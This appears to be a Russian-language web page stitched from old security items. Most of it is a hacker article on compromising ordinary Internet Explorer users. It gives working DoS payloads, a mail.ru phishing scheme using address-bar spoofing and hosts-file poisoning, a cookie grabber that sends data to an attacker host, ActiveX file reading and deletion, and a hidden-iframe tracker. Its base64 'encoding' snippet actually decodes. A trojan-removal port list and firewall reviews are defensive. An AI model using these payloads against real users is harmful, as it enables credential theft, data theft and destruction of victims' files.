RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

Уязвимости в ПО для интернета

07.03.05 2005

Возвращение Land (Источник:BUGTRAQ)

По сообщению Дежана Леваджи (Dejan Levaja), Windows Server 2003 и XP SP2 с отключенным файрволлом оказались подвержены старому доброму Land. Идея Land-атаки, первые сведения о которой относятся аж к 97 году, заключается в отправке tcp-пакета с адресами получателя и отправителями, совпадающими с адресом атакуемой машины. В те времена получение всего одного такого пакета приводило к замораживанию атакуемой системы на десятки секунд. В дальнейшем реакция NT на эту атаку была серьезно улучшена, но сейчас, похоже, все вернулось на круги своя.

P.S. Microsoft считает, что данная атака не представляет большой опасности, поскольку не приводит к возможному исполнению удаленного кода, атакованная машина лишь становится "медлительной" на некоторое время, и, наконец, включенный файрволл из SP2 полностью от нее защищает. Так-то оно так, машины стали быстрее, файрволлы от всех этих атак более-менее защищают, но это ж не повод пропускать в реализацию стека давным давно известные ляпы, с таким подходом и до winnuke рукой подать.

Энциклопедия уязвимостей IE

 

Новости

Опасность вейпинга
Вpeднa ли coя жeнщинaм
Вcя пpавда o яйцаx
Вpaчи нaпoмнили o pискe зapaзиться гeпaтитoм в сaлoнaх кpaсoты
В кaкoе время сyтoк лyчше не лечиться
Tиxий чаc дважды в нeдeлю cнижаeт pиcк инфаpкта и инcульта в два pаза
Слaдкaя гaзиpoвкa вoздействyет нa opгaнизм
Почeмy витaминныe добaвки нe пpиноcят пользы
Кeфиp yлyчшaeт микpoфлopy кишeчникa
 

0x0. Введение

Очень часто мы испытываем необходимость в получении доступа к необходимой информации, содержащейся не на каком-нибудь unix-сервере, уязвимом к новому эксплоиту в openssh, а у обычного рядового юзера internet, которые посещает странички, сидя в Internet Explorer под Windows 98. С ходу в голову приходит применение социальной инженерии. А что если он уже осекался на этом и теперь с улыбкой реагирует на все ваши попытки развода?? Вот взлому таких пользователей и посвящена эта статья. Все что нужно от него - это браузер IE и система Windows,плюс чуток заинтересованности в ваших словах. Все тесты я проводил в системе Win98SE с IE 6.0 без сервиспаков - судя по статистике посещений f0kp - эта связка используется большинством пользователей WWW.

От вас же требуется масса терпения и способности к _качественному_ креативу,также нужно умение общаться - иначе как вы убедите пользователя посетить вашу страничку?? Все остальное вы найдете в этой статье.

0x1. Атаки DoS

Цель: Для развлечения этот метод атаки не подходит - быстро надоедает, к тому же не так явно видны результаты. Использовать его можно и нужно для временного устранения оппонента из сети для проведения более интеллектуальной атаки или там для `поздравления подружки' путем отправки ей открытки с таким кодом. Это же можно использовать в качестве цели проведения атаки XSS в каком-либо крупном уязвимом форуме или где-либо еще. То же самое касается дефейсов - таким образом можно отвадить от посещения конкретного сайта большую часть аудитории, создать ему антирекламу.

1.1 Зависание IE.

Этот баг обнаружил Fabian Becker. Суть его состоит в том, что если в адресной строке IE набрать `C:\AUX', то это приведет к зависанию окна IE 6.0. Для устранения этого состояния необходимо прибить процесс IE [ при этом помимо повисшего окна закроются все остальные ]. Баг был протестирован автором в WinXP со всеми патчами и сервиспаками. Я тестировал его в Win2k prof, что дало аналогичный результат. В win98se браузер просто выводит список программ, чтобы вы выбрали из него ту, с помощью которой открывать этот файл. Однако если набрать ту же самую последовательность в Проводнике windows [ explorer.exe ], то это опять же приведет к зависанию. На практике это используется следующим образом.Вы создаете страничку примерно следующего вида

<a href="C:\AUX">Click here</a>

и заманиваете на нее вашу жертву, заставляя щелкнуть по ссылке. Разумеется, что пользователь может и западозрить неладное, а может ему лень куда-то щелкать..Тогда мы заставим его сделать это при помощи простейшего кода на JavaScript:

<script>

parent.location="file:///C:\\AUX";

</script>

Небольшое отступление для тех из вас, кто не знает, что такое AUX.

Итак в операционной системе ms-dos, которая лежит в основе windows, существует несколько зарезервированных словосочетаний:

CON - консоль

PRN - принтер

NUL - нулевое устройство [ аналог /dev/null в unix ]

AUX - асинхронный интерфейс

LPT[1-3] - параллельный порт(ы)

COM[1-4] - последовательный порт(ы)

По сути, это ничто иное как обычные файлы, но выполняющие более сложную роль;неправильное обращение с этими файлами устройств приводит к появлению BSOD'а или зависания системы [ в зависимости от ОС, области применения и наличия, либо отсутствия патчей к этой уязвимости ]. Именно поэтому система не позволит вам создать файл или директорию, в имени или расширении которых есть одно из этих слов. Однако отсутствие проверок в некоторых областях системы может привести к забавным результататам.

1.2 Смена цвета фона

Данный эксплоит обнаружен человеком по имени THR в далеком 1999 году. Эксплоит обходил новую методику, реализованную разработчиками Microsoft в новом тогда IE5, которая пресекала работу бесконечных циклов, приводящих к зависанию или замедлению работы системы. Как ни странно, но этот эксплоит успешно делает свое дело и в IE 6:

<HTML>

<BODY>

<SCRIPT>

var color = new Array;

color[1] = "black";

color[2] = "white";

for(x = 0; x <3; x++)

{

document.bgColor = color[x]

if(x == 2)

{

x = 0;

}

}

</SCRIPT>

</BODY>

</HTML>

1.3 Еще одна DoS

Нижеприведенный код работает во всех версиях Internet Explorer.

<html>

<input type>

<script>

(for i in all.document.tags)

</script>

</html>

Пожалуй, на этом остановимся и перейдем к более интересным уязвимостям браузера IE.

 

0x2. Подделка значения адрессбара

Данный метод позволяет нам установить произвольное значение в адресной строке браузера при посещении пользователем той или иной страницы. Скажем, пользователь реально ``находится'' на vasya_kewl.narod.ru, и в то же время в адресной строке браузера у него видно

Понятно, что это открывает перед нами обширные возможности по получению каких угодно паролей от пользователя-жертвы. Вполне естесственно, что здесь нужно приложить по максимуму усилий, чтобы все выглядело натурально. Иными словами,если вы напишите что-то типа ``Это блин новый дезайн майл.ру. Ввидити свой пороль'', то вряд ли что у вас получится. Необходимо воссоздать полную копию нужного сайта с тем лишь исключением, что расположен он будет на подконтрольном вам сервере и что регистрационные данные, вводимые пользователем, будут сначала сохраняться в файл/высылаться по почте/icq, и лишь потом отправляться на реальный сервер mail.ru

Для этого воспользуемся недавним багом. Создайте страницу со следующим кодом:

<button onclick="location.href=unescape('http://www.mail.ru%[email protected]');">

Check

</button>

При нажатии на кнопку, пользователю загрузится страница index.html с нашего сайта [ hack.narod.ru ], которая полностью имитирует главную страницу mail.ru.Теперь дело за малым, сохранить логин и пароль, введенные пользователем.

Основная проблема здесь, заставить пользователя нажать на эту кнопку - это уж ваша задача. Могу только сказать, что использовать именно кнопку совсем не обязательно.Вы можете сделать как обычную ссылку, так и автоматический редирект на вышеприведенный URL.

Конечно, вы можете сказать, что средствами javascript можно вообще выключить адрессбар, но это слишком заметно и подозрительно, равно как и первый пример для более-менее опытного пользователя. Самый сильный и надежный способ заключается в том, чтобы добавить в файл c:\windows\hosts запись вида:

YOUR_IP www.mail.ru

где вместо YOUR_IP будет прописан адрес IP подконтрольного вам web-сервера, на котором будет расположена точная копия сайта mail.ru. Проблема здесь только в том, чтобы удалить эту запись из системы жертвы после того как нужный вам акаунт будет получен.

Чтобы не грузить с примерами, возьмем пример из статьи ``Форматирование жесткого диска'', которую вы можете найти в этом же выпуске журнала.Немного изменяем код, и он делает то, что нам нужно. То есть, переменной f1 даем значение ``c:\\windows\\hosts'', а вместо команды format прописываем вышеприведенную

строку. В итоге получается что-то вроде этого:

var f1='c:\\windows\\hosts';

a.WriteLine("echo "213.231.98.24 www.mail.ru");

IP укажите тот, на котором у вас web-сервер с копией сайта mail.ru

 

0x3. Получение файлов cookie

На самом деле, это тривиальная задача, поэтому особо здесь расписывать я эту тему не буду. Ключевым компонентом в этом деле является имеющийся в IE about: url - вот о нем и поговорим. К примеру, откройте окно браузера и введите в адресной строке что-то вроде:

about:<script>alert(document.cookie)</script>

Как ни странно, браузер проинтерпретирует этот код и выведет содержимое файла cookie текущего сайта. Поскольку мы ни на какой сайт не заходили, то содержимое появившегося окна будет пустым. Но если мы напишем что-то вроде

about://mail.ru<script>alert(document.cookie)</script>

и если перед этим вы посещали сайт mail.ru, то на экране будет отображено содержимое cookie mail.ru. Окей, это круто, конечно, но только какой от этого толк, ведь cookie отображаются в окне браузера самой жертвы. Поэтому мы сохраним полученные куки в переменную hacked_cook и отдадим нашему скрипту-грабберу:

hacked_cook=document.cookie;

hk=open("http://ebil_boxnet/grab?grb="+hacked_cook);

 

0x4. Чтение локальной файловой системы

---- --- -- -

Работа с файловой системой удаленного компьютера также не вызывает осложнений за счет наличия соответствующих багов. В последующих примерах все операции мы будем производить над файлом fuck.txt. В реальной ситуации, естесственно, вам нужно будет заменить это имя тем, которое нужно:

Читаем файлы:

<IFRAME name="I1" src="file://c:/fuck.txt"></IFRAME>

<script>

function f()

{

window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");

}

setTimeout("f()",2000);

</script>

Итак, что у нас здесь происходит?? Содержимое файла fuck.txt мы сохраняем в фрейм с именем I1, а потом выводим его содержимое. Вместо alert нужно воспользоваться функцией open, которой необходимо передать URL вашего сценария,который получит и сохранит текст этого файла с машины жертвы.

Удаляем файлы:

<script>

var fso = new ActiveXObject("Scripting.FileSystemObject");

fso.DeleteFile("C:\\fuck.txt");

</script>

Единственная проблема состоит в том, что при выполнении сценария IE показывает предупреждение о том, что, возможно, выполнение этого кода небезопасно. Как это вылечить смотрите в статье ``Форматирование жесткого диска''.

0x5. IEHK

-

В настоящий момент существует не так уж и много способов выполнения произвольного кода в Windows. Есть на эту тему один интересный проект, который называется IEHK - Internet Explorer Hacking Kit. Набор программ и примеров,использующих различные уязвимости IE. В частности полезен для конструирования собственных эксплоитов, которые, в отличие от всяких PoC shit, присылаемых в BT,позволяют выполнять именно то что вы захотите, а не какой-нибудь там notepad.exe. Вот в нем и приведены различные примеры использования самых разных уязвимостей IE, в том числе OE [ outlook express использует ie для парсинга писем, пришедших в формате html ].

0x7. Приложения

[1] Как узнать имя и версию браузера??

Для этого достаточно прочитать переменную HTTP_USER_AGENT, которая передается браузером в каждом HTTP-запросе. Это можно сделать на любом серверном языке сценариев [ perl, php, python ] и даже средствами JavaScript. В последнем случае вам придется передать полученные данные на какой-либо сторонний серверный сценарий для ее сохранения. Вот как подобное можно сделать при помощи DTML в Zope:

<dtml-sendmail mailhost="HackHost">

To: "[email protected]"

Subject: "my user-agent"

&REQUEST

</dtml-sendmail>

Этот код присылает на мой почтовый ящик весь запрос целиком. То есть помимо версии и имени браузера там будут и IP, адрес прокси, etc. Все что остается сделать это дать кому-нибудь ссылку на эту страничку, и код будет выполнен.Однако, давать ссылку напрямую не есть правильно, зачем лишний раз маячить своим хостом перед глазами юзера. Регистрируем какую-нибудь неприметную страничку на narod.ru и выкладываем туда что-нибудь, при этом в нее следующий код:

<iframe style="width=1px; height=1px;" src="http://evilbox.net/user_agent">

При посещении этого вашего hack.narod.ru в странице незаметно [ за счет размеров фрейма ] произойдет вызов вашего сценария-граббера, а пользователь ни о чем и подозревать не будет.

[2] Как закодировать .exe в base64??

Для этого можно использовать, например, такой код на python:

import base64

from sys import argv

infile = argv[1]

outfile = argv[2]

base64.decode(open(infile, 'r'), open(outfile, 'w'))

Использовать так:

c:\> python bs64.py chervirus.exe out.txt

.:EOF:.

10.04.2004

Уязвимость в WinAmp

Модуль in_mod.dll содержит фрагмент кода, отвечающий за загрузку *.xm-файлов, который из-за некорректной проверки размеров буфера позволяет переписать произвольный фрагмент динамической памяти. Таким образом, появляется возможность подготовить такой mod-файл, при загрузке которого с веба и последующем проигрывании на пользовательской машине выполнится внедренный код с правами активного пользователя. Уязвимы версии 2.91-5.02 (возможно, и более старые), недавно вышедшая версия 5.03 уже исправлена. Приверженцам старых версий остается лишь удалить библиотеку in_mod.dll

Jan 11 2003

Здесь представлен список портов, а также потенциально опасных служб, относящихся к каждому из них, с приведением их файлов и вхождений в системный реестр Win, необходимых для удаления.

Помните о том, что после удаления файлов или правки реестра необходимо перезагрузить систему, для того чтобы убедиться в нормальной работе системы в целом и всех запущенных процессов в отдельности. Если вы удаляете некоторые параметры из системного реестра Windows, обязательно перезагрузите систему, перед тем как приступить к удалению связанных с ними файлов.

Порты 21, 5400-5402

¤Служба: Back Construction

Удаляемый параметр реестра:

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Shell)

Удаляемый файл: \windows\Cmctl32.exe

¤Служба: Blade Runner

Удаляемый параметр реестра:

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:System-Tray)

Удаляемый файл: server.exe

¤Служба: Fore

Удаляемый файл: fore.exe

¤Служба: Invisible FTP

Удаляемый файл: ftp.exe

Порт 23

¤Служба: Tiny Telnet Server

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windll.exe = "C:\WINDOWS\Windll.exe"

Удаляемый файл: c:\windows\windll.exe

Порты 25, 110

¤Служба: Antigen

Удаляемый файл: antigen.exe

¤Служба: Email Password Sender

Удаляемый файл: winstart.bat, winstat.exe, priocol.exe, priocol.dll

¤Служба: Shtrilitz

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Tspool)

Удаляемый файл: spool64.exe

¤Служба: Stealth

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ (Ключ: Win-protect System)

Удаляемый файл: winprotecte.exe

¤Служба: Tapiras

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: tapiras.exe)

Удаляемый файл: tapiras.exe

¤Служба: WinPC

Удаляемый файл: winpc.exe

Порты 41, 999, 2140, 3150, 6670-6771, 60 000

¤Служба: Deep Throat

Удаляемый параметр реестра:

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Systemtray)

Удаляемые файлы: systray.exe, pddt.dat

Порты 79, 5321

¤Служба: Firehotker

Удаляемый файл: server.exe

Порт 80

¤Служба: Executor

Удаляемый файл: server.exe

Порт 113

¤Служба: Kazimas

Удаляемый файл: milbug_a.exe

Порт 121

¤Служба: JammerKillah

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices(Ключ:

MsWind32drv)

Удаляемый файл: MsWind32.drv

Порты 531,1045

¤Служба: Rasmin

Удаляемые файлы: rasmin.exe, wspool.exe, winsrvc.exe, inipx.exe, upgrade.exe

Порты 555, 9989

¤Служба: phAse Zero

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:MsgServ) Удаляемый файл: msgsvr32.exe

Порт 666

¤Служба: Attack FTP

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Reminder)

Удаляемые файлы: wscan.exe, drwatsom.exe, serv-u.ini, results.dll, vwer.dll

¤Служба: Back Construction

Удаляемый параметр реестра:

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Shell)

Удаляемый файл: cmctl32.exe

¤Служба: Cain & Abel

Удаляемый файл: abel.exe

Порты 1010-1015

¤Служба: Doly Trojan

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\фaйл tesk.exe

Удаляемый файл: tesk.exe

Порт 1042

¤Служба: BLA

Удаляемые параметры реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\System = "C:\ WINDOWS\System\mprdll.exe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemDoor-"C:\ WINDOWS\System\rundll argp1"

Удаляемый файл: mprdll.exe

Порт 1234

¤Служба: UItors Trojan

Удаляемый файл: t5port.exe

Порты 1243, 6776

¤Служба: SubSeven

Удаляемые файлы: nodll.exe, server.exe, kernel16.dll, windows.exe, wtching.dll, lmdrk_33.dll

Порт 1245

¤Служба: VooDoo Dolt

Удаляемый файл: adm.exe

Порт 1492

¤Служба: FTP99CMP

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:WinDLL_16)

Удаляемые файлы: windll16.exe, serv-u.ini

Порт 1981

¤Служба: shockrave

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Network Popup)

Удаляемый файл: netpopup.exe

Порт 1999О Служба: BackDoor

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:notpa)

Удаляемый файл: notpa.exe

Порты 1999-2005, 9878

¤Служба: Transmission Scout

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:kernel16) Удаляемый файл: kernel16.exe

Порт 2001

¤Служба: Trojan Cow

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sys-Window)

Удаляемый файл: syswindow.exe

Порт 2115

¤Служба: Bugs

Удаляемый параметр реестра:

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Systray) Удаляемый файл: systemtr.exe

Порты 2140, 3150О Служба: The Invasor

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sys-

temDLL32)

Удаляемый файл: runme.exe

Порты 2155, 5512

¤Служба: Illusion Mailer

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ:Sysmem) Удаляемый файл: memory.exe

Порт 2565

¤Служба: Striker

Удаляемый файл: servers.exe

Порт 2600

¤Служба: Digital RootBeer

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: ActiveX

Console)

Удаляемый файл: patch.exe

Порт 2989

¤Служба: RAT

Удаляемые параметры реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer = "C:\ WINDOWS\Sybtem\MSGSVR16.EXE"

HKLMXSofbvareVMicrosoftWindowsVCurrentVersionXRunServicesXDefeult-" '' HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Explorer-" "

Порты 3459-3801

¤Служба: Eclipse

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Rnaapp«"C:\ WINDOWS\System" (Ключ: rmaapp)

Удаляемый файл: rmaapp.exe

Порты 3700, 9872-9875, 10067,10167

¤Служба: Portal of Doom

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: String)

Удаляемые файлы: ljsgz.exe, server.exe

Порт 4567

¤Служба: File Nail

Удаляемый файл: server.exe

Порт 5000

¤Служба: Bubbel

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Windows)

Удаляемый файл: bubbel.exe

Порты 5001, 30303, 50505

¤Служба: Sockets de Troie

Удаляемые параметры реестра:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunLoadMSchv32Drv - C:\WINDOWS\System\MSchv32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunLoadMgadeskdll= C:\WINDOWS\System\ Mgadeskdll.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\RunLoadRsrcload = C:\WINDOWS\Rsrcload.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\RunLoadCsmctr32 = C:\WINDOWS\Csmctrl32.exe

Удаляемый файл: mschv32.exe

Порт 5569

¤Служба: Robo-Hack

Удаляемый файл: robo-serv.exe

Порт 6400

¤Служба: The tHing

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Ключ: Default)

Удаляемый файл: thing.exe

Порт 6912

¤Служба: Shit Heep

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: recyde-byn)

Удаляемые файлы: system.exe, update.exe

Порты 6969, 16969О Служба: Priority

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Pserver)

Удаляемый файл: pserver.exe

Порт 6970

¤Служба: GateCrasher

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Inet)

Удаляемый файл: system.exe

Порт 7000

¤Служба: Remote Grab

Удаляемый файл: mprexe.exe

Порт 9400

¤Служба: InCommand

Удаляемый файл: olemon32.exe

Порт 10 101

¤Служба: BrainSpy

Удаляемые параметры реестра: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Dualji

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Gbubuzhnw

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices — Fexhqcux

Удаляемый файл: brainspy.exe

Порт 10 520

¤Служба: Acid Shivers

Удаляемые файлы: en-cid12.exe, en-cid12.dat

Порт 10 607О Служба: Coma

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ:

Runtime)

Удаляемые файлы: msgsrv36.exe, server.exe

Порт 12 223

¤Служба: Hack'99 KeyLogger

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: HkeyLog)

Удаляемый файл: HkeyLog.exe

Порты 12 345-12 346

¤Служба: Netbus/2/Pro

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Netbus)

Удаляемые файлы: sysedit.exe, patch.exe

Порты 20 000-20 001

¤Служба: Millennium

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Millennium)

Удаляемый файл: hool.exe

Порт 21 544

¤Служба: Girlfriend

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: windll)

Удаляемый файл: windll.exe

Порты 22 222, 33 333

¤Служба: Prosiak

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\(Ключ: Microsoft DLL Loader)

Удаляемые файлы: windll32.exe, prosiak.exe

Порт 30 029

¤Служба: AOL Trojan

Удаляемый параметр реестра:

НKEY_LOCAL_MASHINE\Software\Microsoft\Windows\CurrentVersion\Run\ (Ключ: dat92003)

Удаляемый файл: dat92003.exe

Порты 30 100-30 102

¤Служба: Netsphere

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: nssx)

Удаляемый файл: nssx.exe

Порты 1349, 31 337-31 338, 54 320-54 321

¤Служба: Back Orifice

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ (Ключ: bo)

Порты 31785-31792

¤Служба: Hack'a'Tack

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Explorer32)

Удаляемый файл: expl32.exe

Порт 3 3911

¤Служба: Spirit

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: SystemTray)

Удаляемый файл: windown.exe

Порт 40 412

¤Служба: The Spy

Удаляемый параметр реестра:

HKLM\Software\Micrdsoft\Windows\CurrentVeraon\RunServices\(Ключ: Systray)

Удаляемый файл: systray.exe

Порт 47 262

¤Служба: Delta Source

Удаляемый параметр реестра:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\(Ключ: Ds admin tool)

Порт 65 000

¤Служба: Devil

Удаляемые файлы: opscript.exe, winamp34.exe, wingenocid.exe, icqflood.exe

Наблюдение за портами и их блокировка

Программы, предназначенные для наблюдения за портами и их блокировки, функционируют как мини-брандмауэры. Приставка «мини» в этом термине может быть интерпретирована не совсем правильно: здесь «мини» не означает, что подобные программы предлагают меньшую степень защиты, чем привычные брандмауэры. Она указывает на то, что этим термином обозначаются персональные механизмы защиты конечной системы. Мини-брандмауэры — это будущее систем защиты. По определению, брандмауэры функционируют как мосты между компьютерными сетями, защищающие каждую из них от несанкционированного доступа. Однако на сегодняшний день эти системы не могут обеспечить приемлемый уровень защиты.

Современные системы, в том числе и персональные компьютеры, содержат информацию, привлекающую хакеров, кракеров и других киберпанков. Брандмауэры можно рассматривать как основу, на которой строится защита системы, однако, к сожалению, хакерские атаки можно производить и при существовании подобных устройств в сети. Более того, атаки могут происходить и изнутри системы. Следовательно, применение брандмауэров — это только первый шаг к достижению должного уровня защищенности вашей системы. Необходимо закрыть все дыры не только снаружи, но и изнутри нее.

Эта задача решается программами наблюдения за портами и их блокировки, самые популярные из которых описаны ниже. Популярность их не в том, что они хорошо продаются или установлены на многих компьютерах, а в предлагаемом ими высоком уровне защиты. Описываемые утилиты защищают системы, ведя наблюдение за работой портов и блокируя все нежелательные соединения. Обычно такие программы работают через физические интерфейсы (сетевые платы, NIC) или через виртуальные интерфейсы, такие, как телефонные соединения.

Рассмотрим несколько программ защиты персональных систем.

Программа Blacklce Defender

Программа Blacklce Defender фирмы Network ICE (www.networkice.com) — это система защиты от хакеров, диагностирующая персональный компьютер по цифровой линии (DSL), кабельному модему или через простое телефонное соединение. Она призвана предупреждать пользователя о хакерских атаках. После обнаружения попытки несанкционированного доступа программа автоматически воспроизводит предупреждающий звук, после чего блокирует трафик, исходящий от того источника.

Механизм предупреждения можно изменить: если получить доступ пытается доверенный источник, то такое соединение не блокируется. Однако в этом случае потенциальную опасность представляют атаки хакеров, маскирующихся под доверенные источники, поэтому оптимальным методом защиты может оказаться блокирование портов. Другими недостатками Blacklce Defender являются: невозможность фильтрования входящего трафика на уровне приложений, малое количество правил управления доступом, а также недоработки в программе.

Если не учитывать вышеупомянутые недостатки, Blacklce Defender работает на должном уровне. Программа может создавать отчеты о несанкционированных атаках, а также хранить их историю. Встроенный механизм поиска собирает информацию о хакерских атаках, вычисляя их IP-, DNS- и МАС-адреса, а также сохраняя все данные, отправленные ими на ваш компьютер. Все попытки получения незаконного доступа квалифицируются программой по специальной шкале. Например, атаки, имеющие рейтинг 59 или ниже, обычно являются пробными атаками или попытками сканирования, производимыми в начальной стадии получения информации о системе. Атаки, получившие рейтинг выше 59, обычно производятся опытными хакерами и могут закончиться нежелательным проникновением в систему.

Компания Network ICE также предлагает новую разработку, называемую ICEPaq Security Suite. Этот пакет создан для защиты корпоративных сетей и поддерживает доступ через VPN. ICEPaq предлагает два решения: либо отдельный модуль программы устанавливается на каждом сервере в отдельности, либо управление осуществляется централизированно.

Продукты компании Network ICE подходят как для небольших компаний, так и для предприятий среднего класса и крупных корпораций.

Программа LockDown 2000

Программа LockDown 2000 (www.lockdown2000.com) предназначена для защиты системы. Она может осуществлять поиск троянских коней и отслеживать атаки, производимые при помощи ICQ или Nuke . Программа может удалить большое количество разнообразных троянских коней в вашей системе и восстановить после этого ее стабильную работу. Более того, программа LockDown 2000 отслеживает доступ ко всем совместно используемым ресурсам. Совсем недавно этот пакет считался одним из лучших среди приложений защиты.

Программа Norton Internet Security

Программа Norton Internet Security (www.norton.com) предлагает первоклассную защиту от хакерских атак. Пакет может противостоять таким удаленным атакам, как шторм запросов на обслуживание (атаки типа DoS), заражение вирусами, а также обеспечивает защиту от разрушительных компонентов Active-X, приложений Java и других. Программа Norton Internet Security также содержит новую технологию LiveUpdate, при помощи которой автоматически проверяет и загружает свежие базы вирусов из Интернета. Более того, вы можете выполнить настройку управления передачей для защиты личной информации от получения cookie. Имея такие богатые функциональные возможности, программа Norton Internet Security по праву считается одной из самых надежных систем защиты.

Интерфейс программы содержит множество настроек, что, однако, может оттолкнуть своей сложностью начинающего пользователя. Разработчики попытались дополнить управляющий интерфейс автоматической настройкой брандмауэра. Однако если пользователь будет не очень внимателен, то он может случайно запретить и необходимые стандартные коммуникаций. Известно, что стабильность системы может измениться после установки полного комплекта программы, например могут происходить ее отказы, что исправляется только удалением пакета. Однако подобная проблема может возникать из-за несовместимости программ при одновременной работе Norton Internet Security с другими брандмауэрами.

Программа ZoneAlarm Pro

Программа ZoneAlarm Pro компании Zone Labs (www.zonelabs.com) — это еще один популярный защищающий демон, предназначенный для работы с доступом по телефонной линии, DSL, кабельному соединению и другим. Продукт блестяще справляется с защитой системы от несанкционированного доступа, в том числе от атак, произведенных по схеме «укрывания». Вы можете легко создавать правила безопасности для блокировки доступа через Интернет, разрешая при этом совместное использование ресурсов внутри сети. Все настройки производятся при помощи простого и интуитивно понятного интерфейса пользователя. Компания также предлагает бесплатную версию программы ZoneAlarm для защиты домашних компьютеров. Компания Zone Labs анонсирует следующие характеристики своей программы:

¤ парольная защита установок программы от копирования;

¤ настройка соединений с Интернетом и трансляции сетевых адресов при помощи одного нажатия клавиши мыши;

¤ специализированные утилиты, дающие возможность корпоративным пользователям настроить программу для специфических нужд защиты;

¤ выделение зоны IP-адресов, в которой можно осуществить блокировку сканирования портов;

¤ настройка способа оповещения программы о попытке взлома системы и управление записью атак;

¤ расширенные возможности контроля над использованием Интернета различными приложениями;

¤ модуль проверки вложений электронных сообщений MailSafe, умеющий определять и защищать систему от 37 подозрительных типов файлов.

С другой стороны, программа ZoneAlarm не имеет мощных средств конфигурирования, на которые рассчитывают опытные пользователи. Таким образом, можно сказать, что развитие этого продукта сейчас находится на начальном этапе.

28.06.2003 Интервью с Евгением Касперским

За последние несколько месяцев произошло так много событий, взбудораживших всю мировую IT-общественность, что мы просто не могли не обратиться за комментариями к компетентным экспертам. Поразмыслите сами: "крестовый поход" червя Slammer, поставивший "на колени" добрую четверть всего Интернета, грядущий релиз Microsoft Office 2003 - продукта, который тесно поддерживает XML почти во всех своих приложениях и документах, новая версия червя Tanatos, высокотехнологичное распространение червя Sobig, многовекторный червь Fizzer, конференция АДЭ (Ассоциации Документальной Электросвязи) и много всего другого. В начале февраля пользователи и эксперты просто испугались, что эпидемии червей типа Slammer смогут повториться еще не раз. А заявление Microsoft о поддержке XML в Microsoft Office 2003 вызвало массу волнений: ведь снова может хлынуть лавина макровирусов. В дополнение к этим вопросам на повестку дня вынесена еще одна глобальная проблема: бреши в системе безопасности ПО. Именно они могут позволить вирусу заразить весь Интернет за 5 минут без 